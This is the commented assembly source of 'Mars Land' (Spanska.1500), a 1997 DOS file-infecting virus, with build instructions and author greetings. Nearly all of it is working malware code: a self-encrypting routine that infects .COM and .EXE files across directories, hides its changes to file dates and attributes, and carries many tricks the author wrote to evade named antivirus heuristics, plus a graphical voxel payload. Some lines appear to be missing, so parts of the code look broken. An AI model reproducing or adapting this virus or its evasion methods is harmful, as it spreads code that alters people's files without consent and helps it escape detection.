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; MARS LAND virus by Spanska
; Called Spanska.1500 by AV people
; This is my third virus
; THIS VIRUS IS DEDICATED TO... uhhh... nobody this time :)
; Or maybe to all the virus coders who do not destruct with
; their creations. I've put the phrase "Coding a virus can
; be creative" to show that an original infection routine,
; a funny payload or a new mutation engine, are far more
; interesting for the coder and for other people than stupid
; destruction.
; I worked some weeks on this virus graphic effect. A simple
; routine to delete a hard drive would have taken me one
; minute to copy/paste it. So, no interest.
; Greets to Griyo (best virus coder on this side of the
; galaxy), MrSandman and other guys from 29A (the best group!),
; to Roadkill, Slacker, and friends on IRC (from Luxembourg,
; Spain, Sweden and everywhere), Poltergst and Cicatrix for
; their job on the web. And to the very few french virus
; coders, or even fighters (salut Jean-Luc!).
;******************************contact me at el_gato@rocketmail.com***
; At the time it was released (march 97), the detection was:
; TBSCAN flags: c?K on .exe's, nothing on .com's
; FPROT: "ear variant" on unencrypted generation 0, nothing after
; DrSolly Findvirus: nothing
; DrWeb: nothing
; AVP: nothing
; (i saw in newsgroups that a scanner i can't remember flags it
; sometimes like a Whale variant, never happened to me)
; generation zero size: 1660
; virus size: 1500
; compile it with TASM /m2 and TLINK /t
; Properties:
; simple .com/.exe runtime infector
; file search routine is essentially derived from my NO PASARAN virus
; not destructive
; encrypted with variable key
; infects 3 .com and 3 .exe each run
; infects current directory, than upper directories
; when it reaches the root, it starts infecting all "level1" subdirectories
; does not infect files <500 bytes, nor command.com
; the VGA graphic bomb (a 3D voxel effect) explodes
; when minutes=30 and seconds<30 (1/120)
code segment
assume ds:code, ss:code, cs:code, es:code
org 100h
;---------------fake host code--------------------
call virus ;jump to viral code (avoid J flag)
signature db "ee" ;virus signature
nop ;
nop ;fake host
nop ;
nop ;
mov ah, 4ch ;finished
mov al,0 ;go to
int 21h ;DOS
virus: ;virus starts here
;-------------in case of an exe, let's work in cs--------------
push ds ;save ds on stack... Don't forget it...
push cs ;we are in the virus segment
push cs ;so we have to adjust
pop es ;ds and es to point
pop ds ;to this segment
;---------------get delta offset----------------------------
call $+3 ;modified classic
delta: ;routine to
mov bp, sp ;avoid flag E
mov ax, [bp] ;
add word ptr [bp], decrypte-delta ;thanks Slacker's Theory
sub ax, offset delta ;of Code through Obscurity!
mov bp, ax
clef db 0 ;the crypting key
;=== this stosb ===
;=== when outside decrypt loop ===
;=== does not flag # ===
baise_flag_cryptage: ;===
stosb ;=========>>> NO MORE FLAG "#" !!!!!
ret ;===
;----------------------decrypting routine-------------------------
mov dl, [bp+offset clef] ;actual key in dl
mov cx, fin_cryptage - debut_cryptage ;number of bytes to decrypt
lea si, [bp+offset debut_cryptage] ;si=start of zone to decrypt
mov di, si ;di=start of zone to decrypt
xor_loop: ;decrypt loop
lodsb ;get byte to decrypt in al
nop ;just here to make a 1500 bytes virus ;)
xor al, dl ;the byte is decrypted with the key
call baise_flag_cryptage ;call the outside stosb (avoid flag #)
loop xor_loop ;finish decryption
debut_cryptage: ;start of the crypted zone
;------transfert of infected file information on another zone---------
; (for final normal execution of the program)
lea si, [bp+offset pip] ;from this zone
lea di, [bp+offset vip] ;to this zone
movsw ;we transfer 8 bytes
;---------------initialisation to 0 of directory counter--------------
; and 2 infection counters (com and exe)
lea di, [bp+offset phase] ;they are here
xor ax, ax ;put them to zero
stosw ;(3 counters = 3 bytes)
;--------------------remember current repertory------------------
lea si, [bp+offset repert] ;si on good memory zone
xor dl, dl ;dl=0 is default unit
mov ah, 47h ;47h=current dir in memory
int 21h ;go!
;---------------DTA go to a predefined zone in memory-------------
push 1a00h ;push/pop to
pop ax ;avoid flag F
lea dx, [bp+offset dta]
int 21h
;-----------------find first .com file-------------------------
mov cx, 0007h ;attributes
lea dx, [bp+offset file_com] ;file mask for a .com
mov ax, 4e00h ;4eh=find first file
int 21h ;file found?
jnc sauter_suivant ;yes => c=0, let's continue
jmp infecte_exe ;no => go to .exe infection
;---------------------find next .com file-------------------------
lea dx, [bp+offset file_com] ;
mov ax, 4f00h ;4Fh=find next file
mov cx, 0007h
int 21h ;file found?
jnc saut5 ;yes => c=0, let's continue
jmp infecte_exe ;no => go to .exe infection
;---------------verify if extension is really .com---------------------
; (it's made to avoid flag S with tbscan)
call verifie_extension ;call verification routine
cmp word ptr [si], "MO" ;second and third letters are "OM"?
jne fichier_suivant ;no => find next .com file
;----------------verify if it's command.com----------------------------
cmp word ptr [bp+offset dta+1eh+2], "MM" ;test 3rd and 4th letter
je fichier_suivant ;yes => find next file
;--------------attributes to 0 to infect special files-------------
call attrib_a_zero
;--------------------open file, and verify header-----------------------
call ouvre_et_verif_header
jmp fichier_suivant ;if header not good (already infected)
;we get here and search another file
;if header good we get here on routine return
;--------transfer 5 first bytes of the .com to another zone----------
lea si, [bp+offset exehead]
lea di, [bp+offset cinq_octets]
;-----------before infection, change of the crypting key-----------
call change_clef
;------------disk file pointer at the end-----------
mov ax, 4202h
xor cx, cx
mov dx, cx
int 21h
call infecte
;--overwrite 5 first bytes on the disk by jump to virus code + signature---
;1) move disk file pointer to start of the file
call pointeur_debut
;2) calculate initial jump and write all on a temp zone in memory
lea di, [bp+offset cinq_octets]
mov al, 0E8h ;E8=opcode of CALL
mov ax, word ptr [bp+offset dta+1ah] ;ax=file size
sub ax, 3 ;this is because of the CALL
mov ax, "ee" ;signature
;3) overwrite 5 first bytes on the file
mov cx,5
lea dx, [bp+offset cinq_octets]
call ecrit_fichier
;----------------restore time/date of the file--------------------
call restaure_time
;------------close file and restore file attributes--------------------
call remise_en_etat
;--------verify how many .com files we have infected------------------
mov byte ptr cl, [bp+offset compteur_com] ;infection counter in cl
inc cl ;one more
cmp cl, 3 ;have we infected 3 .com files?
je infecte_exe ;yes => let's infect .exe now
mov byte ptr [bp+offset compteur_com], cl ;no => write new value of counter
;-----------------let's infect a new .com file------------------
jmp fichier_suivant ;go infect next file
;------------------find first .exe file-------------------------
mov cx, 0007h ;attributes
lea dx, [bp+offset file_exe] ;file mask for a .exe
mov ax, 4e00h ;4eh=find first file
int 21h ;file found?
jnc sauter_exe_suivant ;yes => c=0, let's continue
jmp rep_sup ;no => go to upper directory
;------------------find next file-------------------------
lea dx, [bp+offset file_exe] ;file mask for a .exe
mov ax, 4f00h ;4Fh=find next file
mov cx, 0007h ;attributes
int 21h ;file found?
jnc saut_exe ;yes => c=0, let's continue
jmp rep_sup ;no => go to upper direcory
saut_exe: ;
;---------------verify if extension is really .com---------------
; (it's made to avoid flag S with tbscan)
call verifie_extension ;call verification routine
cmp word ptr [si], "EX" ;second and third letters are "OM"?
jne exe_suivant ;no => find next .exe file
;------------attributes to 0 to infect special files-------------
call attrib_a_zero
call ouvre_et_verif_header
jmp exe_suivant ;if header not good (already infected or
;windows file) we get here and search
;another file
;if header good, we get here
;------------verify that it's really a .exe with MZ header----------------
lea si, [bp+offset exehead]
add ah, al ;to avoid flag Z
cmp ah, 167 ;(M+Z in ASCII is 167)
jne exe_suivant ;if it's not MZ or ZM, find next .exe file
;-----------before infection, change the crypting key-----------
call change_clef
;----------------save old .exe header values-------------------------
lea di, [bp+offset pIP]
mov ax, word ptr [bp+ exehead+14h] ;save IP
mov ax, word ptr [bp+ exehead+16h] ;save CS
mov ax, word ptr [bp+ exehead+0Eh] ;save SS
mov ax, word ptr [bp+ exehead+10h] ;save SP
;---------disk file pointer at the end (return dx:ax = size)---------
mov bx, [bp+offset handle]
mov ax, 4202h
xor cx, cx
xor dx, dx
int 21h
push ax ;save size on stack
push dx ;useful for next calculations
;----------------calculate new cs:ip---------------------------------
push ax
mov ax, word ptr [bp+exehead+08h]
mov cl, 4
shl ax, cl
mov cx, ax
pop ax
sub ax, cx
sbb dx, 0
mov cl, 0Ch
shl dx, cl
mov cl, 4
push ax
shr ax, cl
add dx, ax
shl ax, cl
pop cx
sub cx, ax
mov word ptr [bp+ exehead+14h], cx ;new calculated values
mov word ptr [bp+ exehead+16h], dx ;put in the header zone
mov word ptr [bp+ exehead+0Eh], dx ;in memory
mov word ptr [bp+ exehead+10h], 0FFFEh
;-----------------calculate new size---------------------------
pop dx
pop ax
push ax
add ax, fin_cryptage-virus
adc dx, 0
mov cl, 7
shl dx, cl
mov cl, 9
shr ax, cl
add ax, dx
inc ax
mov word ptr [bp+ exehead+04h], ax
pop ax
add ax, fin_cryptage-virus
and ah, 1
mov word ptr [bp+ exehead+02h], ax
;-----------------write signature----------------------------------
mov word ptr [bp+exehead+12h], "ee"
call infecte
;----------write new header of the infected file on disk---------------------
mov ax, 4200h
push ax ;this stupid push/pop
pop ax ;to avoid DrWeb heuristic
xor cx, cx
xor dx, dx
int 21h ;pointer at start of file on disk
mov cx, 1Ch
lea dx, [bp+exehead]
call ecrit_fichier ;write on disk modified header
;----------restore time/date of the file--------------------
call restaure_time
;----------close file and restore file attributes----------------------
call remise_en_etat
;--------verify how many .exe files we have infected------------------
mov byte ptr cl, [bp+offset compteur_exe] ;counter in cl
inc cl ;one more
cmp cl, 3 ;we infect 3?
je bombe_ou_pas ;yes => let's stop infections
mov byte ptr [bp+offset compteur_exe], cl ;no => write counter
;--------let's infect a new .exe file------------------
jmp exe_suivant ;go infect next file
;--------------------does the bomb explode?---------------------
mov ah, 2Ch ;internal clock: ch=hour et cl=minute
int 21h
cmp cl, 30d ;minutes = 30?
jne redonne_main ;no => return to host
cmp dh, 30d ;yes => test seconds
ja redonne_main ;if secondes > 30 we return to host
jmp bombe ;if seconds <30 (1/120) the bomb explodes
;------------------DTA in the normal zone-----------------------------
; (to avoid perturbing host program)
push 1a00h ;push/pop
pop ax ;to avoid flag F
mov dx, 80h ;to 80h, the normal zone
int 21h
;--------restore the directory in which we were when we started-----------
lea dx, [bp+offset repert]
mov ax, 3B00h ;3bh=change directory
int 21h
;-----------active host is a .com or a .exe?-------------------
cmp byte ptr cs:0, 0CDh ;a .com file have an Int20h
je redonne_main_com ;(word CD 20) at offset 0
;-------------return to an .exe---------------------------
pop ds ;remember the very first push ds
push ds
pop es ;get es=ds
mov ax, es
add ax, 10h
add word ptr cs:[bp+vCS], ax
add ax, word ptr cs:[bp+vSS] ;adjust stack pointers
mov ss, ax
mov sp, word ptr cs:[bp+vSP]
jmp retour_au_prog
pip db 90h,90h ;zone to keep file information
pcs db 90h,90h ;EXE: keep ip, cs, ss, sp
pss db 90h,90h ;COM: keep 5 first bytes
psp db 90h,90h
db 0EAh ;far jump opcode, for .exe
vIP dw 0 ;zone to keep temporarly file info
vCS dw 0 ;EXE: keep ip, cs, ss, sp
vSS dw 0 ;COM: keep 5 first bytes
vSP dw 0
;-----------------------return to a .com---------------------------
pop ax ;clean stack (remember first push ds)
;---------replace 5 first bytes of the host in memory----------
lea si, [bp+offset contenu] ;memory zone where they are
mov ax, 101h ;this is to
dec ax ;avoid flag B in TBSCAN
mov di, ax ;a .com start at offset 100h
movsb ;move 5 bytes
;-----------------------return to host----------------------------
; (remember the very first CALL: we have 103h on the stack)
pop ax ;get 103h
sub ax, 3 ;we want 100h
push ax ;re-put it on stack (for the RET)
xor ax, ax ;a starting program
xor bx, bx ;likes to find all
xor cx, cx ;registers equals
xor dx, dx ;to zero
ret ;return to normal program
;----------climb to upper directory--------------------------
lea dx, [bp+offset dot] ;let's go to ".." repertory
mov ah, 3bh
int 21h ;are we in the root?
jc on_redescend ;yes => c=1, let's go down now
jmp recherche ;no => find first file
;---if we are in root, let's go to all "first-level" subdirectories-------
mov ah, 4eh ;find first file
mov cx, 16 ;with directory attribute
lea dx, [bp+offset dir_masque] ;called "*.*"
int 21h ;one found?
jnc contin ;yes => continue
jmp bombe_ou_pas ;no => test time for the bomb
cmp byte ptr[bp+offset phase], 0 ;how is the dir counter (called phase)?
je le_premier ;phase=0 => do not find next dir
xor bh, bh
mov bl, byte ptr [bp+offset phase] ;bx=phase
rep_suivant: ;loop to avoid all subdir already infected
mov cx, 16 ;directory attributes
mov ah, 4fh ;find next dir
int 21h ;one found?
jnc contin2 ;yes => continue
jmp bombe_ou_pas ;no => test time for the bomb
cmp byte ptr [bp+offset dta+15h], 16 ;is it really a directory?
jne rep_suivant ;no => find next
dec bx ;this routine is made to infect
cmp bx, 0 ;directory "number phase"
jne rep_suivant ;if bx<>0, the subdir is already infected
add byte ptr[bp+offset phase], 1 ;OK, we are on a subdir not infected
lea dx, [bp+offset dta+1eh] ;so, let's change
mov ah, 3bh ;directory to it
int 21h
jmp recherche ;and infect this new subdirectory
; ROUTINE OFTEN USED (to save bytes)
;-------------------verify extension-------------------------
mov cx, 13d ;max size of a file name (not really, but
lea si, [bp+offset dta+1eh] ;who cares? I've stolen this routine somewhere)
compare: ;loop for detecting start of the extension
lodsb ;letter in al
cmp al, "." ;is it a point?
jne compare ;no => test next letter
inc si ;yes => si points on second extension letter
;------------------change crypting key---------------
mov ah, 2Ch ;internal clock
int 21h ;cx get quite randomic
mov [bp+offset clef], cl ;let's keep it somewhere
;------------------------open file-------------------------
mov ax, 3D02h ;3D02h=open file
lea dx, [bp+offset dta+1eh] ;name of the file in DTA
int 21h
jnc saut2 ;one file found, c=0, continue
jmp remise_en_etat ;not found => arrange file
saut2: ;continue
mov [bp+offset handle],ax ;keep handle in memory
;----------------read first 1Ch bytes of the file-----------------
xchg ax, bx ;handle in ax
mov cx, 1Ch ;number of bytes to read
mov ax, 3F00h ;3F=read file
lea dx, [bp+offset exehead] ;dx on stockage zone
int 21h
jnc saut3 ;no problem, c=0, continue
jmp remise_en_etat ;problem => arrange file
saut3: ; continue
;-----------is the file already infected?-------------
cmp byte ptr [bp+offset exehead+18h], 40h ;is it a windows file?
jz deja_infecte ;yes => don't touch
cmp word ptr [bp+offset exehead+3], "ee" ;.com already infected?
jz deja_infecte ;yes => don't touch
cmp word ptr [bp+offset exehead+12h], "ee" ;.exe already infected?
jnz saut4 ;no => continue
jmp remise_en_etat ;let's arrange the file
saut4: ;continue
;--------------------is the size correct?-------------------
cmp [bp+offset dta+1ah], 500 ;do not infect if file<500 bytes
ja verif_ok ;it's OK
;--------arrange file and close it in case of non-infection-----------
mov ah, 3Eh ;3Eh=close file
int 21h
;-----------------restore file attributes-----------------------
call restaure_attrib ;restore attributes
;------after arranging the file, let's go back to the CALL-------
;----------------------if it's good to infect,-------------------
; let's go back one instruction after the call
pop ax ;get offset of the return on the stack
add ax, 2 ;add 2 (size of a short JMP)
push ax ;put it back on the stack
ret ;return 2 bytes after the call
;first, let's write non-encrypted part
mov cx, debut_cryptage - virus ;size of non-encrypted part
lea dx, [bp+offset virus] ;dx on beginning of this part
call ecrit_fichier ;write this on disk
;second, let's crypt next part in memory
mov dl, [bp+offset clef] ;dl=new key
lea si, [bp+offset debut_cryptage] ;si=start of crypted zone
lea di, [bp+offset zone_de_travail] ;di=temp memory zone for crypting
mov cx, fin_cryptage - debut_cryptage ;cx=number of bytes to crypt
crypte_et_transfere: ;the loop
lodsb ;get original byte
xor al, dl ;crypt it
stosb ;put it on memory
loop crypte_et_transfere ;again
;third, disk writing of the crypted zone
mov cx, fin_cryptage - debut_cryptage ;number of bytes to write
lea dx, [bp+offset zone_de_travail] ;dx=offset of the temp zone
call ecrit_fichier ;write it on disk
;-------------------modify attributes-------------------------
xor cx, cx ;if we want to put attrib to zero
jmp suite_attrib
xor ch, ch ;if we want to restore attrib
mov cl, byte ptr [bp+offset dta+15h] ;from the DTA value
lea dx, [bp+offset dta+1eh] ;file name
push 4301h ;43h=change attribs
pop ax ;avoid flag F from TBSCAN
int 21h
;---------------------restore file time/date-----------------------
mov dx, word ptr [bp+offset dta+18h] ;date from DTA to dx
mov cx, word ptr [bp+offset dta+16h] ;time from DTA to cx
push 5701h ;5701h=change time/date
pop ax ;avoid flag F from TBSCAN
int 21h
;------------------write file on disk----------------------
push 4000h ;the famous 40Hex... push/pop to
pop ax ;avoid DrSolomon and DrWeb heuristic
int 21h
;--------------------move pointer on disk---------------------------
pointeur_debut: ;to put pointer at the beginning
xor dx, dx
pointeur_debut_sans_dx: ;i think i don't use this... never mind
xor cx, cx
mov ax, 4200h ;42h=move disk pointer
push ax ;stupid push/pop to avoid
pop ax ;DrWeb heuristic
int 21h
largeur equ 128 ;size of the grid
mov ax, 13h
int 10h
;----------------------black palette--------------------------------
; because mountains are calculated directly on screen)
mov dx, 3c8h ;dx = palette port
xor al, al ;start with color 0
out dx, al ;write first color in the port
inc dx ;define all others colors
mov cx, 768 ;256 colors x 3 composantes, all at zero
out dx, al ;write black on port
loop tout_noir
;---------draw to an area of the screen some big blocks----------
; area used: 50 lines x 128 columns on the left top
mov ax, 0A000h ;video memory
mov es, ax ;in es
mov cx, 150 ;number of blocks
mov ax, [bp+offset aleat]
mov dx, 8405h ;semi-random routine stolen
mul dx ;in a fire demo
inc ax ;give a random dx
mov [bp+offset aleat], ax
push dx ;dl = random byte for the line
shr dl, 1 ;now 0<dl<128
shr dl, 1 ;now 0<dl<64
cmp dl, 41 ;if dl>41
ja pas_pixel ;we don't draw it
cmp dl, 5 ;if dl<5
jb pas_pixel ;we don't draw it
mov ax, 320 ;calculation of video offset
xor dh, dh ;we have to multiply just dl
mul dx ;by 320
pop dx ;dh = random byte for the column
cmp dh, 112 ;if dh>112
ja pas_pixel ;we don't draw it
cmp dh, 8 ;if dh<8
jb pas_pixel ;we don't draw it
xor dl, dl ;we have to multiply just dh
xchg dl, dh ;we put it in dl
add ax, dx ;let's add line*320 and column => random place
xchg di, ax ;this random offset in di
mov al, 255 ;big blocks are in color 255
push cx ;save loop counter
mov bl, 4 ;blocks are 4 pixels tall
mov cx, 10 ;blocks are 10 pixels wide
rep stosb ;write them on screen...
add di, 310
dec bl
jne gros_pixel
pop cx
loop boucle
;-----soften blocks to get mountains, by a immobile fire effect----------
;here es=video
mov ax, cs ;get cs
add ah, 16 ;add to it 256*16 bytes to get ds
mov ds, ax ;ds now points on a free segment (i hope so :)
push ds ;on the stack (cf [@@] later)
mov bl, 25 ;bl = number of degradation cycles
xor si, si ;ds:si=free segment
xor di, di ;es:di=video
xor ax, ax
mov cx, 50*320 ;we degrade on 50 first lines of the screen
mov al, es:[di-1]
add al, es:[di+1]
adc ah,0
add al, es:[di+320] ;sum all pixels colors around offset di
adc ah,0
add al, es:[di-320]
adc ah,0
shr ax, 1
shr ax, 1 ;divide this color by 4, so it's the average
je pas_dec ;if color=0, color stays to 0
dec al ;on other case, we decrement color
mov byte ptr ds:[si], al ;new color value in free segment
inc si
inc di
loop degrade ;loop for all the 50x128 area
xor si, si ;one degradation cycle finished:
xor di, di ;we copy all the area
mov cx, (50*320)/2 ;from the free segment
rep movsw ;to video memory
dec bl ;one cycle more
jne cycle ;25 cycles? No => again
;we now have on the screen (but we can't see it
;because all is black) soft spots, this is the
;landscape in 2D
;--------------creation of the 3D table (x,y,z)------------------------
; from the 2D landscape on screen; this table is
; 128x50x(1+1+2) = 25 Ko, this is why we need one free segment
;here es=video ds=free segment
push es ;we want ds=video et es=free segment
push ds
pop es
pop ds
mov cx, largeur*50+2 ;there will be 128x50 coordinates (+2 for security)
xor si, si ;start of video memory
xor di, di ;start of free segment
mov dl, 128 ;we need a line counter
mov ah, dl ;the X (left/right): between 0 and 128
shl ah, 1 ;now between 0 and 256
mov al, 128
sub al, ah ;now between -128 and +128
stosb ;put it on free segment
movsb ;the Y (top/bottom) is directly the pixel color
dec dl ;see if we are at the end of the line
jne pas_fin_de_ligne ;if dl<>0 we are not
mov dl, 128 ;if dl=0 the line counter is re-put to 128
add si, 320-largeur ;and the video offset go to next line
mov ax, cx ;the Z (near/far): between 0 and 50*128
shl ax, 1 ;now between 0 and 50*256
xor al, al ;we just need ah (between 0 and 50)
xchg ah, al ;put it on al
shl al, 1 ;now between 0 and 100
shl al, 1 ;now between 0 and 200
add ax, 0080h ;now between 128 and 328 (nearest Z will be 128)
stosw ;put it on free segment
loop table ;calculate all table
;------------------delete the 2D landscape------------------------
;here ds=video es=free segment
push ds
pop es
xor di, di ;from the beginning of screen
mov cx, (320*50)/2 ;delete all the 50 lines
xor ax, ax ;with words=0, faster than bytes
rep stosw ;delete all
;---------put text cursor at good coordinates on screen-----------------
mov dx, 030Ah ;dh, dl = line/column coordinates
xor bh, bh ;on page 0
mov ah,02h ;int BIOS 02h=put cursor
int 10h
;--------------write the 2 text messages-------------------------
;ici ds=es=video
push cs
pop ds
lea si, [bp+offset message] ;si points on message
mov cx, 21 ;message length
lodsb ;get letter
mov bl, 125 ;color=red
mov ah, 0Eh ;int BIOS OEh=write one letter
int 10h
loop affiche_message
add dx, 507 ;adjust coordinates for second message
mov ah, 02h ;int BIOS 02h=put cursor
int 10h
lea si, [bp+offset messag2] ;si points on message
mov cx, 32 ;message length
lodsb ;get letter
mov bl, 50 ;color=yellow
mov ah, 0Eh ;int BIOS OEh=write one letter
int 10h
loop affiche_messag2
;------------------adjust martian palette----------------------------
mov dx, 3c8h ;dx = palette port
xor al, al ;start with color 0
out dx, al ;write first color in port
inc dx ;define all other colors
xor cx, cx ;starts with black
mov al, cl
out dx, al ;loop to define all 63 first colors
xor ax, ax ;with a growing red
out dx, al
out dx, al
inc cl
cmp cl, 63
jne rouges
xor cx, cx
mov al, 63
out dx, al
mov al, cl ;loop to define 63 next colors
out dx, al ;with a growing green
xor al, al
out dx, al
inc cx
cmp cx, 63
jne jaunes
;-------------------animation of the landscape------------------------
;here ds=cs, es=video
pop ds ;ds points to free segment [@@] see above
anime: ;get here when one screen is totally drawn
mov cx, largeur*50 ;we will draw 50x128 voxels
xor si, si ;ds:si=where 3D coordinates are (free seg)
xor di, di ;es:di=video
dessine: ;get here when one voxel is drawn
lodsb ;put X in al
xchg dl, al ;transfer it in dl
lodsb ;put Y in al
xchg bl, al ;transfer it in bl
mov byte ptr bh, ds:[si+3+4] ;put NEXT_Y (for the shadow effect) in bh
lodsw ;put Z in ax
mov word ptr cs:[bp+offset z], ax ;not enough registers: put Z in memory
cmp ax, 0080h ;is the voxel at the nearest limit?
ja ca_sort_pas ;no => it can advance more
add ax, 200 ;yes => return at the farest limit
dec ax ;it advances: the Z decrements
mov word ptr ds:[si-2], ax ;and we write this new Z as new coordinate
;------calculate xx and yy (2D screen) from x, y and z (3D space)------
; by a perspective effect
; (remember: X is in dl, Y in bl, Z in its memory location)
push cx ;we will need cx here, so save it on stack
xchg ah, dl ;X coordinate from dl to ah
cmp ah, 128 ;X positive?
jb suite5 ;yes => no problem
neg ah ;no => let's "positive" it
mov byte ptr cs:[bp+offset signe],1 ;and let's remember it was negative
suite5: ;NB: calculations are in "fixed point" mode
xor al, al ;X is in ah: same "order" than Z (word)
xor dx, dx ;dx will not fuck up the division
div word ptr cs:[bp+offset z] ;X/Z
push ax ;result is the 2D coordinate (XX), push it
mov al, bl ;Y coordinate from bl to al
mov cl, 4 ;divise Y/16 to have a mountain height
shr al, cl ;between 0 and 16
mov ah, 80 ;beware: mountains are "top on bottom"
sub ah, al ;level 0 = altitude 80, so soustraction
;('cause in VGA 0,0 = top left)
xor al, al ;"fixed point" mode: Y is now in ah
xor dx, dx ;dx will not fuck up the division
div word ptr cs:[bp+offset z] ;Y/Z
xchg cx, ax ;the result is the 2D coordinate (YY)
;---------------calculate video offset of the voxel-------------------
; (remember: XX is on stack and YY is in CX)
pop dx ;get XX
cmp cx, 142 ;do not write voxel if too at bottom
ja pas_plot
cmp dx, 155 ;do not write voxel if too on the side
ja pas_plot
push dx ;put again XX on stack
mov ax, 320 ;we gonna calculate voxel video offset
mul cx ;multiply YY by 320
pop dx ;get XX
cmp byte ptr cs:[bp+offset signe], 1 ;are X and so XX negatives?
jne pos
sub ax, dx ;yes => offset is ax - XX
mov byte ptr cs:[bp+offset signe], 0 ;and we can forget this sign now
jmp suite4
add ax, dx ;no => offset is ax + XX
add ax, (320*60)+160 ;to put the animation at screen bottom
;--------calculate voxel color (with 2 shadow effects)------------------
;first shadow effect, depends on curvature of mountain sides
mov di, ax ;ax is video offset of the voxel
xchg ax, bx ;remember: bx contains Y et NEXT_Y
sub al, ah ;shadow will depend on NEXT_Y - Y; can
add al, 100 ;be >0 (one side of the mountain)
;or <0 (other side), so add an
;average value
;if voxel is too far, put it black
mov word ptr bx, cs:[bp+offset z] ;now bx=Z (remember 128<Z<328)
cmp bx, 285 ;is voxel very far?
jb pas_eteindre ;no => OK, write it
xor al, al ;yes => write a black voxel instead
;second shadow effect: the farest, the darkest
shr bx, 1 ;now 64<bx<164
shr bx, 1 ;now 32<bx<82
sub ax, bx ;sub the color with the distance
;--------calculate voxel size (the nearest, the biggest)----------------
mov bx, 328 ;maximum Z
sub bx, cs:[bp+offset z] ;now bx=0 (far) or bx=200 (near)
mov cl, 6 ;divide by 64
shr bx, cl ;now 0<bx<3
inc bx ;now 1<bx<4
inc bx ;now 2<bx<5 (number of pixels wide)
mov dx, 2 ;voxel will be always 2 lines height.
mov cx, bx ;number of pixels wide in cx
rep stosb ;write them on screen
mov cx, 320 ;we have to draw second line
sub cx, bx ;adjust with voxel wide
add di, cx ;go to offset of next line
dec dx ;first line finihed
jne dessine_voxel ;draw second line
pas_plot: ;we get here in case of too extreme coordinates
pop cx ;don't forget the counter
dec cx ;one voxel more is drawn
je suite9 ;if all voxels are drawn, start another screen
jmp dessine ;go calculate next voxel
jmp anime ;go calculate next screen
;---------------memory zones used by the graphic effect------------------
message db "Mars Land, by Spanska" ;message 1
messag2 db "(coding a virus can be creative)" ;message 2
aleat dw 0FAh ;random seed
z dw 3 ;temporarly used for Z
signe db ? ;to remember the sign of X
;--------------------memory zones used by the virus----------------------
dir_masque db "*.*",0 ;to find subdirectories
file_com db "*.C*",0 ;to find .com files
file_exe db "*.E*",0 ;to find .exe files
dot db "..",0 ;to climb on superior directory
fin_cryptage: ;end of crypted zone
;-------------all the following is not written on disk------------------
; (temporarly memory zone used by the virus)
phase db 0 ;subdirectory counter
compteur_com db 0 ;.com infection counter
compteur_exe db 0 ;.exe infection counter
handle db 0,0 ;handle of current file
dta db 48 dup (0AAh) ;temporary DTA
repert db 64 dup (0FFh) ;starting directory
exehead db 1Ch dup(0aah) ;1Ch first bytes of files (com or exe)
zone_de_travail: ;zone used to crypt the virus
code ends
end hote
;------------------------(c) Spanska 1997------------------------------